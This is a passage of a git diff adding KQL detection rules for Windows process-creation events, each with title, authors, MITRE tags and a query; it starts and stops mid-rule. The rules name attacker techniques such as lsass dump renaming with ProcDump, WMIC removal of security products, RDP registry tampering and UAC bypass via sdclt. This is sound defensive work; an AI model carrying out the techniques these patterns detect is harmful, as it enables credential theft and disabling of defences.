+| where (((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%")) and (FolderPath endswith "\\mofcomp.exe" or ProcessVersionInfoOriginalFileName =~ "mofcomp.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"))) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_suspicious_registry_file_imported_via_reg_exe.kql b/KQL/rules/windows/process_creation/potential_suspicious_registry_file_imported_via_reg_exe.kql
new file mode 100644
index 00000000..eac0d05c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_suspicious_registry_file_imported_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious Registry File Imported Via Reg.EXE
+// Author: frack113, Nasreddine Bencherchali
+// Date: 2022-08-01
+// Level: medium
+// Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+// False Positives:
+//   - Legitimate import of keys
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " import " and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\" or ProcessCommandLine contains "C:\\ProgramData\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_suspicious_windows_feature_enabled_proccreation.kql b/KQL/rules/windows/process_creation/potential_suspicious_windows_feature_enabled_proccreation.kql
new file mode 100644
index 00000000..aa27fb56
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_suspicious_windows_feature_enabled_proccreation.kql
@@ -0,0 +1,13 @@
+// Title: Potential Suspicious Windows Feature Enabled - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-29
+// Level: medium
+// Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
+// Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Legitimate usage of the features listed in the rule.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Enable-WindowsOptionalFeature" and ProcessCommandLine contains "-Online" and ProcessCommandLine contains "-FeatureName") and (ProcessCommandLine contains "TelnetServer" or ProcessCommandLine contains "Internet-Explorer-Optional-amd64" or ProcessCommandLine contains "TFTP" or ProcessCommandLine contains "SMB1Protocol" or ProcessCommandLine contains "Client-ProjFS" or ProcessCommandLine contains "Microsoft-Windows-Subsystem-Linux")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_sysinternals_procdump_evasion.kql b/KQL/rules/windows/process_creation/potential_sysinternals_procdump_evasion.kql
new file mode 100644
index 00000000..492cefa5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_sysinternals_procdump_evasion.kql
@@ -0,0 +1,12 @@
+// Title: Potential SysInternals ProcDump Evasion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-11
+// Level: high
+// Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+//   - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "copy procdump" or ProcessCommandLine contains "move procdump") or ((ProcessCommandLine contains "2.dmp" or ProcessCommandLine contains "lsass" or ProcessCommandLine contains "out.dmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains ".dmp ")) or (ProcessCommandLine contains "copy lsass.exe_" or ProcessCommandLine contains "move lsass.exe_")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql b/KQL/rules/windows/process_creation/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql
new file mode 100644
index 00000000..5c771af8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE
+// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport
+// Date: 2022-02-12
+// Level: high
+// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.lateral-movement, attack.t1021.001, attack.t1112
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fDenyTSConnections" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "SecurityLayer" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "WinStations\\RDP-Tcp")) and (not((ProcessCommandLine contains "SecurityLayer" and ProcessCommandLine contains "02")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_tampering_with_security_products_via_wmic.kql b/KQL/rules/windows/process_creation/potential_tampering_with_security_products_via_wmic.kql
new file mode 100644
index 00000000..384b51d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_tampering_with_security_products_via_wmic.kql
@@ -0,0 +1,12 @@
+// Title: Potential Tampering With Security Products Via WMIC
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-01-30
+// Level: high
+// Description: Detects uninstallation or termination of security products using the WMIC utility
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate administration
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "wmic" and ProcessCommandLine contains "product where " and ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall" and ProcessCommandLine contains "/nointeractive") or ((ProcessCommandLine contains "call delete" or ProcessCommandLine contains "call terminate") and (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "caption like ")) or (ProcessCommandLine contains "process " and ProcessCommandLine contains "where " and ProcessCommandLine contains "delete")) and (ProcessCommandLine contains "%carbon%" or ProcessCommandLine contains "%cylance%" or ProcessCommandLine contains "%endpoint%" or ProcessCommandLine contains "%eset%" or ProcessCommandLine contains "%malware%" or ProcessCommandLine contains "%Sophos%" or ProcessCommandLine contains "%symantec%" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "AVG " or ProcessCommandLine contains "Carbon Black" or ProcessCommandLine contains "CarbonBlack" or ProcessCommandLine contains "Cb Defense Sensor 64-bit" or ProcessCommandLine contains "Crowdstrike Sensor" or ProcessCommandLine contains "Cylance " or ProcessCommandLine contains "Dell Threat Defense" or ProcessCommandLine contains "DLP Endpoint" or ProcessCommandLine contains "Endpoint Detection" or ProcessCommandLine contains "Endpoint Protection" or ProcessCommandLine contains "Endpoint Security" or ProcessCommandLine contains "Endpoint Sensor" or ProcessCommandLine contains "ESET File Security" or ProcessCommandLine contains "LogRhythm System Monitor Service" or ProcessCommandLine contains "Malwarebytes" or ProcessCommandLine contains "McAfee Agent" or ProcessCommandLine contains "Microsoft Security Client" or ProcessCommandLine contains "Sophos Anti-Virus" or ProcessCommandLine contains "Sophos AutoUpdate" or ProcessCommandLine contains "Sophos Credential Store" or ProcessCommandLine contains "Sophos Management Console" or ProcessCommandLine contains "Sophos Management Database" or ProcessCommandLine contains "Sophos Management Server" or ProcessCommandLine contains "Sophos Remote Management System" or ProcessCommandLine contains "Sophos Update Manager" or ProcessCommandLine contains "Threat Protection" or ProcessCommandLine contains "VirusScan" or ProcessCommandLine contains "Webroot SecureAnywhere" or ProcessCommandLine contains "Windows Defender")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_uac_bypass_via_sdclt_exe.kql b/KQL/rules/windows/process_creation/potential_uac_bypass_via_sdclt_exe.kql
new file mode 100644
index 00000000..427d3856
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_uac_bypass_via_sdclt_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential UAC Bypass Via Sdclt.EXE
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "sdclt.exe" and (ProcessIntegrityLevel in~ ("High", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..dbbbbe1e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " service get " and ProcessCommandLine contains "name,displayname,pathname,startmode") and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_winapi_calls_via_commandline.kql b/KQL/rules/windows/process_creation/potential_winapi_calls_via_commandline.kql
new file mode 100644
index 00000000..cccb816c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_winapi_calls_via_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Potential WinAPI Calls Via CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-06
+// Level: high
+// Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1106
+// False Positives:
+//   - Some legitimate action or applications may use these functions. Investigate further to determine the legitimacy of the activity.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "AddSecurityPackage" or ProcessCommandLine contains "AdjustTokenPrivileges" or ProcessCommandLine contains "Advapi32" or ProcessCommandLine contains "CloseHandle" or ProcessCommandLine contains "CreateProcessWithToken" or ProcessCommandLine contains "CreatePseudoConsole" or ProcessCommandLine contains "CreateRemoteThread" or ProcessCommandLine contains "CreateThread" or ProcessCommandLine contains "CreateUserThread" or ProcessCommandLine contains "DangerousGetHandle" or ProcessCommandLine contains "DuplicateTokenEx" or ProcessCommandLine contains "EnumerateSecurityPackages" or ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "FreeLibrary" or ProcessCommandLine contains "GetDelegateForFunctionPointer" or ProcessCommandLine contains "GetLogonSessionData" or ProcessCommandLine contains "GetModuleHandle" or ProcessCommandLine contains "GetProcAddress" or ProcessCommandLine contains "GetProcessHandle" or ProcessCommandLine contains "GetTokenInformation" or ProcessCommandLine contains "ImpersonateLoggedOnUser" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "LoadLibrary" or ProcessCommandLine contains "memcpy" or ProcessCommandLine contains "MiniDumpWriteDump" or ProcessCommandLine contains "ntdll" or ProcessCommandLine contains "OpenDesktop" or ProcessCommandLine contains "OpenProcess" or ProcessCommandLine contains "OpenProcessToken" or ProcessCommandLine contains "OpenThreadToken" or ProcessCommandLine contains "OpenWindowStation" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "QueueUserApc" or ProcessCommandLine contains "ReadProcessMemory" or ProcessCommandLine contains "RevertToSelf" or ProcessCommandLine contains "RtlCreateUserThread" or ProcessCommandLine contains "secur32" or ProcessCommandLine contains "SetThreadToken" or ProcessCommandLine contains "VirtualAlloc" or ProcessCommandLine contains "VirtualFree" or ProcessCommandLine contains "VirtualProtect" or ProcessCommandLine contains "WaitForSingleObject" or ProcessCommandLine contains "WriteInt32" or ProcessCommandLine contains "WriteProcessMemory" or ProcessCommandLine contains "ZeroFreeGlobalAllocUnicode") and (not((((ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "CloseHandle") and InitiatingProcessFolderPath endswith "\\CompatTelRunner.exe") or (ProcessCommandLine contains "GetLoadLibraryWAddress32" and FolderPath endswith "\\MpCmdRun.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql b/KQL/rules/windows/process_creation/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql
new file mode 100644
index 00000000..68f3da01
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql
@@ -0,0 +1,11 @@
+// Title: Potential Windows Defender AV Bypass Via Dump64.EXE Rename
+// Author: Austin Songer @austinsonger, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-11-26
+// Level: high
+// Description: Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.
+// Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceProcessEvents
+| where (FolderPath contains "\\Microsoft Visual Studio\\" and FolderPath endswith "\\dump64.exe" and FolderPath startswith ":\\Program Files") and (ProcessVersionInfoOriginalFileName =~ "procdump" or (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " -mp "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_windows_defender_tampering_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_windows_defender_tampering_via_wmic_exe.kql
new file mode 100644
index 00000000..f80dbf78
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_windows_defender_tampering_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Windows Defender Tampering Via Wmic.EXE
+// Author: frack113
+// Date: 2022-12-11
+// Level: high
+// Description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1562
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/Namespace:\\\\root\\Microsoft\\Windows\\Defender" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql b/KQL/rules/windows/process_creation/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql
new file mode 100644
index 00000000..6cc17ee5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql
@@ -0,0 +1,14 @@
+// Title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
+// Author: Markus Neis @Karneades
+// Date: 2019-04-03
+// Level: medium
+// Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.t1059.001
+// False Positives:
+//   - AppvClient
+//   - CCM
+//   - WinRM
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql b/KQL/rules/windows/process_creation/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql
new file mode 100644
index 00000000..81e30852
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Over Permissive Permissions Granted Using Dsacls.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects usage of Dsacls to grant over permissive permissions
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate administrators granting over permissive permissions to users
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /G " and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") and (ProcessCommandLine contains "GR" or ProcessCommandLine contains "GE" or ProcessCommandLine contains "GW" or ProcessCommandLine contains "GA" or ProcessCommandLine contains "WP" or ProcessCommandLine contains "WD")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql b/KQL/rules/windows/process_creation/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql
new file mode 100644
index 00000000..e4df4694
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-14
+// Level: high
+// Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Roaming\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\") and (FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and FolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_cabinet_file_expansion.kql b/KQL/rules/windows/process_creation/potentially_suspicious_cabinet_file_expansion.kql
new file mode 100644
index 00000000..47897836
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_cabinet_file_expansion.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Cabinet File Expansion
+// Author: Bhabesh Raj, X__Junior (Nextron Systems)
+// Date: 2021-07-30
+// Level: medium
+// Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - System administrator Usage
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-F:" or ProcessCommandLine contains "/F:" or ProcessCommandLine contains "–F:" or ProcessCommandLine contains "—F:" or ProcessCommandLine contains "―F:") and FolderPath endswith "\\expand.exe") and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Admin$\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\C$\\" or ProcessCommandLine contains "\\Temporary Internet") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\"))) and (not((ProcessCommandLine contains "C:\\ProgramData\\Dell\\UpdateService\\Temp\\" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_call_to_win32_nteventlogfile_class.kql b/KQL/rules/windows/process_creation/potentially_suspicious_call_to_win32_nteventlogfile_class.kql
new file mode 100644
index 00000000..06dd67fe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_call_to_win32_nteventlogfile_class.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Call To Win32_NTEventlogFile Class
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-13
+// Level: high
+// Description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Win32_NTEventlogFile" and (ProcessCommandLine contains ".BackupEventlog(" or ProcessCommandLine contains ".ChangeSecurityPermissions(" or ProcessCommandLine contains ".ChangeSecurityPermissionsEx(" or ProcessCommandLine contains ".ClearEventLog(" or ProcessCommandLine contains ".Delete(" or ProcessCommandLine contains ".DeleteEx(" or ProcessCommandLine contains ".Rename(" or ProcessCommandLine contains ".TakeOwnerShip(" or ProcessCommandLine contains ".TakeOwnerShipEx(")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_clickonce_application.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_clickonce_application.kql
new file mode 100644
index 00000000..a74ccf6c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_clickonce_application.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Child Process Of ClickOnce Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-12
+// Level: medium
+// Description: Detects potentially suspicious child processes of a ClickOnce deployment application
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_diskshadow_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_diskshadow_exe.kql
new file mode 100644
index 00000000..b296f73d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_diskshadow_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Child Process Of DiskShadow.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-15
+// Level: medium
+// Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\diskshadow.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_keyscrambler_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_keyscrambler_exe.kql
new file mode 100644
index 00000000..8d07fe60
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_keyscrambler_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Child Process of KeyScrambler.exe
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-05-13
+// Level: medium
+// Description: Detects potentially suspicious child processes of KeyScrambler.exe
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1203, attack.t1574.001
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_regsvr32.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_regsvr32.kql
new file mode 100644
index 00000000..85740b3c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_regsvr32.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Child Process Of Regsvr32
+// Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-05
+// Level: high
+// Description: Detects potentially suspicious child processes of "regsvr32.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+//   - Unlikely, but can rarely occur. Apply additional filters accordingly.
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (not((ProcessCommandLine contains " -u -p " and FolderPath endswith "\\werfault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_vscode.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_vscode.kql
new file mode 100644
index 00000000..7d42e55a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_vscode.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Child Process Of VsCode
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-26
+// Level: medium
+// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+// False Positives:
+//   - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly
+
+DeviceProcessEvents
